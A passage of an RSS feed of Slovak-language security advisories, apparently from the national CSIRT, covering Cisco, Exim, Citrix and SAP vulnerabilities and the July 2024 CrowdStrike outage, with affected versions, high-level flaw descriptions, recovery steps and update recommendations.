mso-fareast-language:SK"></span>https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23465</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23468"><span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span>https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23468</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23474"><span style="font-size:11.5pt;line-height:107%;mso-fareast-font-family:&quot;Times New Roman&quot;;
mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;color:black;
mso-fareast-language:SK"></span>https://www.solarwinds.com/trust-center/security-advisories/cve-2024-23474</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28992">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28992</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28993">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28993</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1169/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch Cisco Security Email Gateway a Cisco Smart Software Manager On-Prem</title>
		<link>/posts/1165</link>
					<comments>/posts/1165#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 19 Jul 2024 12:35:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=1165</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Aktualizované: 09.08.2024 Zraniteľné systémy:CVE-2024-20401 Pozn. zraniteľnosť je možné zneužiť len na zariadeniach, na ktorých sú zapnuté funkcie „file analysis“ (v...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Aktualizované: 09.08.2024</strong></p>



<p><strong>Zraniteľné systémy:</strong><br><span style="text-decoration: underline;">CVE-2024-20401</span></p>



<ul>
<li>Cisco Secure Email Gateway s&nbsp;Cisco AsyncOS vo verziách starších ako 15.5.1-055</li>
</ul>



<p>Pozn. zraniteľnosť je možné zneužiť len na zariadeniach, na ktorých sú zapnuté funkcie „file analysis“ (v Cisco AMP) alebo „content filter“ a&nbsp;komponent Content Scanner Tools je vo verzii staršej ako 23.3.0.4823.</p>



<p><span style="text-decoration: underline;">CVE-2024-20419</span></p>



<ul>
<li>Cisco Smart Software Manager On-Prem vo verziách starších ako 8-202212</li>
</ul>



<p><p class="MsoNoSpacing"><span style="mso-fareast-language:SK">Pozn. produkt Cisco Smart Software Manager On-Prem vo verziách starších  ako  Release 7.0 sa nazýval Cisco Smart Software Manager Satellite</span>.</p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-20401</strong> (CVSS skóre 9,8)<br>Zraniteľnosť spočíva v&nbsp;nesprávnom narábaní s e-mailovými prílohami a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania e-mailov so špeciálne vytvorenými prílohami mohol zneužiť na modifikáciu obsahu ľubovoľných súborov na súborovom systéme zariadení. Útočník by tak mohol vykonať škodlivý kód, vytvoriť nových používateľov s&nbsp;oprávneniami úrovne root, vykonať neoprávnené zmeny v systéme alebo spôsobiť zneprístupnenie služby. Zraniteľnosť je možné zneužiť len za špecifických podmienok popísaných v&nbsp;časti Zraniteľné systémy.</p>



<p><strong>CVE-2024-20419</strong> (CVSS skóre 10,0)<br>CVE-2024-20419 spočíva v nesprávne implementovanej funkcionalite pre zmenu hesla a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorenej HTTP požiadavky mohol zneužiť na zmenu hesla ľubovoľného používateľa a získanie neoprávneného prístupu do systému. V prípade administrátorských účtov môže získať úplnú kontrolu nad systémom.</p>



<p><strong>Spoločnosť CISCO zverejnila na danú zraniteľnosť PoC (Proof of concept), je možné očakávať skenovanie a pokusy o zneužitie chyby.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Neoprávnený prístup do systému<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></li>



<li>Získanie prístupu k&nbsp;citlivým údajom<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></li>



<li>Vykonanie neoprávnených zmien v systéme<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span> </li>



<li>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</li>
</ul>



<p><strong>Odporúčania:</strong><br>Administrátorom a&nbsp;používateľom odporúčame bezodkladne aktualizovať Cisco Security Email Gateway na verziu 15.5.1-055 alebo&nbsp;novšiu a&nbsp;Cisco Smart Software Manager On-Prem na verziu 8-202212 alebo&nbsp;novšiu.</p>



<p><strong>Zdroje:</strong><br><a href=" https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1165/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktualizácia CrowdStrike Falcon spôsobila svetový výpadok služieb</title>
		<link>/posts/1155</link>
					<comments>/posts/1155#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 19 Jul 2024 09:59:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[CrowdStrike]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=1155</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/crowdstrike-logo-E4841C66B6-seeklogo.com_.png" alt="" /></p>Aktualizácia nástroja CrowdStrike Falcon nasadeného na operačných systémoch Windows spôsobila výpadky systémov a služieb po celom svete. Existuje potenciál zneužitia...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/crowdstrike-logo-E4841C66B6-seeklogo.com_.png" alt="" /></p>
<p><strong>Aktualizácia nástroja CrowdStrike Falcon nasadeného na operačných systémoch Windows spôsobila výpadky systémov a služieb po celom svete. Existuje potenciál zneužitia situácie pre kybernetické útoky.</strong></p>



<p><strong>Zraniteľné systémy:</strong><br>CrowdStrike Falcon agent/senzor vo viacerých verziách (aktuálne nešpecifikované výrobcom).</p>



<p><strong>Opis činnosti:</strong><br>Výpadky systémov nastali 19.7.2024 po publikovaní aktualizácie Produktu CrowdStrike Falcon. Chybu podľa spoločnosti CrowdStrike spôsobuje aktualizovaný/pridaný ovládač C-00000291*.sys. Chyba sa prejavuje Windows BSOD stop code: CRITICAL_PROCESS_DIED. Systém ostane v slučke bootovania a vypisuje hlásenie “What failed: csagent.sys”.<br><strong><span style="text-decoration: underline;">Bezpečnostné riziko:</span></strong> Situáciu môžu potenciálne zneužiť útočníci pri rôznych typoch útokov.</p>



<p><strong>Závažnosť zraniteľnosti:</strong> Vysoká</p>



<p><strong>Možné škody: </strong></p>



<ul>
<li>Narušenie dostupnosti služieb a&nbsp;systémov</li>



<li>Kritický výpadok systémov<p class="MsoListParagraph" style="margin-bottom:0cm;margin-bottom:.0001pt;
mso-add-space:auto;text-indent:-18.0pt;line-height:normal;mso-list:l0 level1 lfo1"><span style="font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol;mso-fareast-language:SK"><span style="mso-list:Ignore"></span></span></p></li>
</ul>



<p><strong>Odporúčania:</strong><br>Pokiaľ na Vašom bezpečnostnom systéme CrowdStrike Falcon problém nenastal, neaktualizujte ho a&nbsp;vypnite automatické aktualizácie, kým výrobca problém nevyrieši. Problém spôsobuje najnovšia aktualizácia.<br><br>Pokiaľ Vám Systém spadol (BSOD): </p>



<ol>
<li>Spustite OS Windows v Safe Mode</li>



<li>Vyhľadajte: C:\Windows\System32\drivers\CrowdStrike</li>



<li>Vyhľadajte súbor &nbsp;“C-00000291*.sys” a&nbsp;premenujte ho na “C-00000291*.renamed” alebo ho vymažte</li>



<li>Vypnite automatické aktualizácie agenta CrowdStrike</li>



<li><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;line-height:
normal">Reštartujte systém</p><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;line-height:
normal"></p></li>
</ol>



<p>Proces môžete pre zariadenia v doméne automatizovať pomocou <a href="https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617" data-type="link" data-id="https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617">skupinových politík</a>.</p>



<p><strong>AKTUALIZÁCIA: </strong>Podľa vyjadrenia spoločnosti CrowdStrike <a href="https://www.crowdstrike.com/blog/statement-on-windows-sensor-update/" data-type="link" data-id="https://www.crowdstrike.com/blog/statement-on-windows-sensor-update/">oprava chybnej aktualizácie</a> už je dostupná.</p>



<p><strong>Odkazy:</strong><br><a href="https://www.ncsc.gov.ie/pdfs/CrowdStrike_BSOD_Loop_Issue.pdf">https://www.ncsc.gov.ie/pdfs/CrowdStrike_BSOD_Loop_Issue.pdf</a><br><a href="https://www.theverge.com/2024/7/19/24201717/windows-bsod-crowdstrike-outage-issue">https://www.theverge.com/2024/7/19/24201717/windows-bsod-crowdstrike-outage-issue<span class="css-1jxf684"></span></a><br><a href="https://cybersecuritynews.com/crowdstrike-update-bsod-loop/">https://cybersecuritynews.com/crowdstrike-update-bsod-loop/<span class="MsoHyperlink"></span></a><br><a href="https://x.com/MonThreat/status/1814224117144424937">https://x.com/MonThreat/status/1814224117144424937</a> <br><a href="https://www.circl.lu/pub/tr-87/" data-type="link" data-id="https://www.circl.lu/pub/tr-87/">https://www.circl.lu/pub/tr-87/</a><br><a href="https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617">https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1155/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – jún 2024</title>
		<link>/posts/1126</link>
					<comments>/posts/1126#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 16 Jul 2024 15:31:33 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=1126</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci jún 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci jún 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/07/MS2024-06.pdf" data-type="link" data-id="/wp-content/uploads/2024/06/MS2024-06.pdf">Mesačná správa – 06/2024 PDF (876 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=16888374950890012865">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1126/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť servera Exim</title>
		<link>/posts/1113</link>
					<comments>/posts/1113#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 15 Jul 2024 12:57:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Exim]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1113</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/Exim_450222.webp" alt="" /></p>Mailový server Exim obsahuje zraniteľnosť, ktorá umožňuje útočníkom doručiť obetiam do mailboxu súbory so zakázanou príponou. Ochranou servera prejdú aj...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/Exim_450222.webp" alt="" /></p>
<p><b style="mso-bidi-font-weight:normal">Mailový server Exim obsahuje zraniteľnosť, ktorá umožňuje útočníkom doručiť obetiam do mailboxu súbory so zakázanou príponou. Ochranou servera prejdú aj škodlivé spustiteľné súbory. </b></p>



<p><b style="mso-bidi-font-weight:normal">Zraniteľné systémy: </b></p>



<p>Server Exim verzia 4.97.1 a staršie</p>



<p><b style="mso-bidi-font-weight:normal">Opis činnosti: </b></p>



<p><b style="mso-bidi-font-weight:normal">CVE-2024-39929</b> (CVSS skóre 9,1)</p>



<p><b>Kritická zraniteľnosť</b><span style="mso-bidi-font-weight:
bold"> mailového <b>servera Exim</b> spočíva v&nbsp;nesprávnom spracovaní viacriadkových názvov príloh v&nbsp;hlavičkách v&nbsp;súlade s RFC 2231. Chyba umožňuje útočníkom <b>obísť bezpečnostný mechanizmus</b> na blokovanie príloh s určitými typmi prípon a&nbsp;<b>doručiť</b> obetiam <b>spustiteľné škodlivé prílohy</b>. Pre úspešné dokončenie útoku musí obeť prílohu e-mailu otvoriť.</span></p>



<p><b style="mso-bidi-font-weight:normal">Závažnosť zraniteľnosti: </b><span style="mso-bidi-font-weight:bold">Vysoká</span></p>



<p><b style="mso-bidi-font-weight:normal">Možné škody: </b></p>



<ul>
<li>Obídenie bezpečnostných prvkov</li>



<li>Vykonanie kódu</li>



<li>Narušenie dôvernosti, integrity a dostupnosti systému</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia <a href="https://lists.exim.org/lurker/message/20240710.155945.8823670d.pt.html" data-type="link" data-id="https://lists.exim.org/lurker/message/20240710.155945.8823670d.pt.html">servera Exim</a> aspoň na verziu 4.98.</p>



<p><b style="mso-bidi-font-weight:normal">Odkazy: </b></p>



<div class="wp-block-group is-vertical is-layout-flex wp-container-core-group-layout-3 wp-block-group-is-layout-flex">
<p><a href="https://thehackernews.com/2024/07/critical-exim-mail-server-vulnerability.html">https://thehackernews.com/2024/07/critical-exim-mail-server-vulnerability.html</a></p>



<p><a href="https://lists.exim.org/lurker/message/20240710.155945.8823670d.pt.html">https://lists.exim.org/lurker/message/20240710.155945.8823670d.pt.html</a></p>



<p><a href="https://censys.com/cve-2024-39929/">https://censys.com/cve-2024-39929/</a></p>
</div>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1113/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Citrix opravila viacero zraniteľností svojich produktov</title>
		<link>/posts/1103</link>
					<comments>/posts/1103#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Jul 2024 19:56:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1103</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>Spoločnosť Citrix opravila kritické a vysoko závažné zraniteľnosti vo viacerých svojich produktoch. Zraniteľnosti umožňujú útočníkom získať privilégiá na úrovni SYSTEM,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>
<p><strong>Spoločnosť Citrix opravila kritické a vysoko závažné zraniteľnosti vo viacerých svojich produktoch. Zraniteľnosti umožňujú útočníkom získať privilégiá na úrovni SYSTEM, presmerovať používateľov na škodlivé webstránky, získať citlivé údaje alebo spôsobiť nedostupnosť systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1 staršie ako 14.1-25.53</li>



<li>NetScaler ADC a NetScaler Gateway 13.1  staršie ako  13.1-53.17</li>



<li>NetScaler ADC a NetScaler Gateway 13.0  staršie ako 13.0-92.31</li>



<li>NetScaler ADC 13.1-FIPS staršie ako 13.1-37.183</li>



<li>NetScaler ADC 12.1-FIPS staršie ako 12.1-55.304</li>



<li>NetScaler ADC 12.1-NDcPP staršie ako 12.1-55.304</li>
</ul>



<ul>
<li>NetScaler Console 14.1  staršie ako 14.1-25.53</li>



<li>NetScaler Console 13.1  staršie ako 13.1-53.22</li>



<li>NetScaler Console 13.0  staršie ako 13.0-92.31</li>



<li>NetScaler SVM 14.1 staršie ako 14.1-25.53</li>



<li>NetScaler SVM 13.1 staršie ako 13.1-53.17</li>



<li>NetScaler SVM 13.0 staršie ako 13.0-92.31</li>



<li>NetScaler Agent 14.1  staršie ako  14.1-25.53</li>



<li>NetScaler Agent 13.1  staršie ako 13.1-53.22</li>



<li>NetScaler Agent 13.0  staršie ako 13.0-92.31</li>
</ul>



<ul>
<li>Citrix Workspace pre HTML5 staršie ako 2404.1</li>
</ul>



<ul>
<li>Citrix Provisioning staršie ako 2402</li>



<li>Citrix Provisioning staršie ako 2203 LTSR CU5</li>



<li>Citrix Provisioning staršie ako 1912 LTSR CU9</li>
</ul>



<ul>
<li>Citrix Virtual Apps and Desktops staršie ako 2402</li>



<li>Citrix Virtual Apps and Desktops 1912 LTSR staršie ako CU9</li>



<li>Citrix Virtual Apps and Desktops 2203 LTSR staršie ako CU5</li>
</ul>



<ul>
<li>Citrix Workspace pre Windows staršie ako 2403.1</li>



<li>Citrix Workspace pre Windows staršie ako 2402 LTSR</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong><u>Netscaler ADC a Gateway</u></strong></p>



<p><strong>CVE-2024-5491</strong> (CVSS v4 skóre 7,1) – ak má zariadenie nakonfigurované SNMP (NSIP/SNIP), môže útočník spôsobiť nedostupnosť služby.</p>



<p><strong>CVE-2024-5492</strong> (CVSS v4 skóre 5,1) – „open redirect“, vzdialený neautentifikovaný útočník môže presmerovať používateľov na škodlivé webstránky, pokiaľ sú na sieti s NSIP.</p>



<p><strong><u>NetScaler Console, Agent a SVM</u></strong></p>



<p><strong>CVE-2024-6235</strong> (CVSS v4 skóre 9,4) – útočník s&nbsp;prístupom ku IP adrese Netscaler Console môže získať citlivé informácie.</p>



<p><strong>CVE-2024-6236</strong> (CVSS v4 skóre 7,1) – útočník s&nbsp;prístupom ku IP adrese Netscaler Console, Agent alebo SVM môže spôsobiť nedostupnosť služby.</p>



<p><strong><u>Citrix Workspace pre HTML5</u></strong></p>



<p><strong>CVE-2024-6148</strong> (CVSS v4 skóre 5,3) – pokiaľ je v&nbsp;prostredí nakonfigurovaná služba Global App Configuration Service (GACS), útočník môže obísť jej nastavenia politiky.</p>



<p><strong>CVE-2024-6149</strong> (CVSS v4 skóre 4,8) – ak je útočník prihlásený do obchodu, v&nbsp;ktorom môže spustiť reláciu HTML5, dokáže presmerovať používateľov na zraniteľné webstránky.</p>



<p><strong><u>Citrix Provisioning</u></strong></p>



<p><strong>CVE-2024-6150</strong> (CVSS v4 skóre 4,8) – pokiaľ má útočník prístup k&nbsp;súboru PVSboot.ini, dokáže spôsobiť výpadok Target VM, aj keď nemá administrátorské oprávnenia.</p>



<p><strong><u>Windows Virtual Delivery Agent for CVAD a Citrix DaaS</u></strong></p>



<p><strong>CVE-2024-6151</strong> (CVSS v4 skóre 8,5) – ak má útočník lokálny prístup ku zraniteľnému systému, dokáže si zvýšiť oprávnenia na úroveň SYSTEM.</p>



<p><strong><u>Citrix Workspace pre Windows</u></strong></p>



<p><strong>CVE-2024-6286</strong> (CVSS v4 skóre 8,5) – ak má útočník lokálny prístup ku zraniteľnému systému, dokáže si zvýšiť oprávnenia na úroveň SYSTEM.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Únik citlivých informácií</li>



<li>Nedostupnosť služby</li>



<li>Eskalácia oprávnení</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia na:</strong></p>



<ul>
<li><strong></strong><strong>NetScaler ADC a NetScaler Gateway 14.1-25.53 a novšie</strong></li>



<li><strong></strong><strong>NetScaler ADC a NetScaler Gateway 13.1-53.17 a&nbsp;novšie z 13.1</strong></li>



<li><strong></strong><strong>NetScaler ADC a NetScaler Gateway 13.0-92.31 a novšie z 13.0 </strong></li>



<li><strong></strong><strong>NetScaler ADC 13.1-FIPS 13.1-37.183 a novšie z 13.1-FIPS </strong></li>



<li><strong></strong><strong>NetScaler ADC 12.1-FIPS 12.1-55.304 a novšie z 12.1-FIPS </strong></li>



<li><strong></strong><strong>NetScaler ADC 12.1-NDcPP 12.1-55.304 a novšie z 12.1-NDcPP</strong></li>
</ul>



<ul>
<li><strong></strong><strong>NetScaler Console 14.1-25.53 a&nbsp;novšie z 14.1</strong></li>



<li><strong></strong><strong>NetScaler Console 13.1-53.22 a&nbsp;novšie z 13.1</strong></li>



<li><strong></strong><strong>NetScaler Console 13.0-92.31 a&nbsp;novšie z 13.0</strong></li>



<li><strong></strong><strong>NetScaler SVM 14.1-25.53 a&nbsp;novšie z 14.1</strong></li>



<li><strong></strong><strong>NetScaler SVM 13.1-53.17 a&nbsp;novšie z 13.1</strong></li>



<li><strong></strong><strong>NetScaler SVM 13.0-92.31 a&nbsp;novšie z 13.0</strong></li>



<li><strong></strong><strong>NetScaler Agent 14.1-25.53 a&nbsp;novšie z 14.1</strong></li>



<li><strong></strong><strong>NetScaler Agent 13.1-53.22 a&nbsp;novšie z 13.1</strong></li>



<li><strong></strong><strong>NetScaler Agent 13.0-92.31</strong> <strong>a novšie z 13.0</strong></li>
</ul>



<ul>
<li><strong></strong><strong>Citrix Workspace pre HTML5 2404.1 a novšie</strong></li>
</ul>



<ul>
<li><strong></strong><strong>Citrix Provisioning 2402 a novšie</strong></li>



<li><strong></strong><strong>Citrix Provisioning 2203 LTSR CU5 a novšie</strong></li>



<li><strong></strong><strong>Citrix Provisioning 1912 LTSR CU9 a novšie</strong></li>
</ul>



<ul>
<li><strong></strong><strong>Citrix Virtual Apps and Desktops 2402 a novšie</strong></li>



<li><strong></strong><strong>Citrix Virtual Apps and Desktops 1912 LTSR CU9 a&nbsp;novšie CU</strong></li>



<li><strong></strong><strong>Citrix Virtual Apps and Desktops 2203 LTSR CU5 a&nbsp;novšie CU</strong></li>



<li><strong></strong><strong>Citrix Virtual Apps and Desktops 2402 LTSR</strong></li>
</ul>



<ul>
<li><strong></strong><strong>Citrix Workspace pre Windows 2403.1 a&nbsp;novšie</strong></li>



<li><strong></strong><strong>Citrix Workspace pre Windows 2402 LTSR a&nbsp;novšie</strong></li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.cisa.gov/news-events/alerts/2024/07/09/citrix-releases-security-updates-multiple-products">https://www.cisa.gov/news-events/alerts/2024/07/09/citrix-releases-security-updates-multiple-products</a></li>



<li><a href="https://support.citrix.com/article/CTX677944/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20245491-and-cve20245492">https://support.citrix.com/article/CTX677944/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20245491-and-cve20245492</a></li>



<li><a href="https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-svm-security-bulletin-for-cve20246235-and-cve20246236">https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-svm-security-bulletin-for-cve20246235-and-cve20246236</a></li>



<li><a href="https://support.citrix.com/article/CTX678037/citrix-workspace-app-for-html5-security-bulletin-cve20246148-and-cve20246149">https://support.citrix.com/article/CTX678037/citrix-workspace-app-for-html5-security-bulletin-cve20246148-and-cve20246149</a></li>



<li><a href="https://support.citrix.com/article/CTX678025/citrix-provisioning-security-bulletin-cve20246150">https://support.citrix.com/article/CTX678025/citrix-provisioning-security-bulletin-cve20246150</a></li>



<li><a href="https://support.citrix.com/article/CTX678035/windows-virtual-delivery-agent-for-cvad-and-citrix-daas-security-bulletin-cve20246151">https://support.citrix.com/article/CTX678035/windows-virtual-delivery-agent-for-cvad-and-citrix-daas-security-bulletin-cve20246151</a><a href="https://support.citrix.com/article/CTX678036/citrix-workspace-app-for-windows-security-bulletin-cve20246286">https://support.citrix.com/article/CTX678036/citrix-workspace-app-for-windows-security-bulletin-cve20246286</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1103/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti SAP</title>
		<link>/posts/1101</link>
					<comments>/posts/1101#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Jul 2024 19:53:32 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Disruption of accessibility]]></category>
		<category><![CDATA[SAP]]></category>
		<guid isPermaLink="false">/?p=1101</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>Spoločnosť SAP vydala v júli 2024 balík opráv pre svoje produkty opravujúcich 16 zraniteľností v aplikáciách PDCE, Commerce, Landscape Management, Document...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala v júli 2024 balík opráv pre svoje produkty opravujúcich 16 zraniteľností v</strong> <strong>aplikáciách PDCE, Commerce, Landscape Management, Document Builder, NetWeaver Knowledge Management XMLEditor a ďalších. 2 z nich sú označené ako vysoko závažné. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi čítať všeobecné údaje z tabuľky alebo pristupovať k nesprávne nakonfigurovaným stránkam.</strong><strong> Na zraniteľnosť upozornila spoločnosť Onapsis Research Labs (ORL).</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP PDCE– S4CORE 102, 103, S4COREOP 104, 105, 106, 107, 108</li>



<li>SAP Commerce– HY_COM 2205, COM_CLOUD 2211</li>



<li>SAP Landscape Management &#8211; VCM 3.00</li>



<li>SAP Document Builder &#8211; S4CORE 100, 101, S4FND 102, 103, 104, 105, 106, 107, 108, SAP_BS_FND 702, 731, 746, 747, 748</li>



<li>SAP NetWeaver Knowledge Management XMLEditor,– KMC-WPC 7.50</li>



<li>SAP CRM WebClient UI – S4FND 102, 103, 104, 105, 106, 107, 108, WEBCUIF 701, 731, 746, 747, 748, 800, 801</li>



<li>SAP Business Warehouse &#8211; Business Planning and Simulation, &#8211; SAP_BW 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, SAP_BW_VIRTUAL_COMP 701</li>



<li>SAP S/4HANA Finance (Advanced Payment Management),– S4CORE 107, 108</li>



<li>SAP Business Workflow (WebFlow Services)– SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758</li>



<li>SAP GUI for Windows– BC-FES-GUI 8</li>



<li>SAP Transportation Management (Collaboration Portal)– SAPTMUI 140, 150, 160, 170</li>



<li>SAP Enable Now– WPB_MANAGER_CE 10, WPB_MANAGER_HANA 10, ENABLE_NOW_CONSUMP_DEL 1704</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-39592 (CVSS skóre 7,7 )</strong></p>



<p><strong>Vysoko závažná zraniteľnosť CVE-2024-39592, chýbajúca kontrola autorizácie</strong><strong>, sa nachádza v nástroji PDCE (Product Design Cost Estimating). Chyba umožňuje vzdialenému útočníkovi čítať všeobecné údaje z&nbsp;tabuľky, čo ovplyvňuje dôvernosť systému.</strong><strong></strong></p>



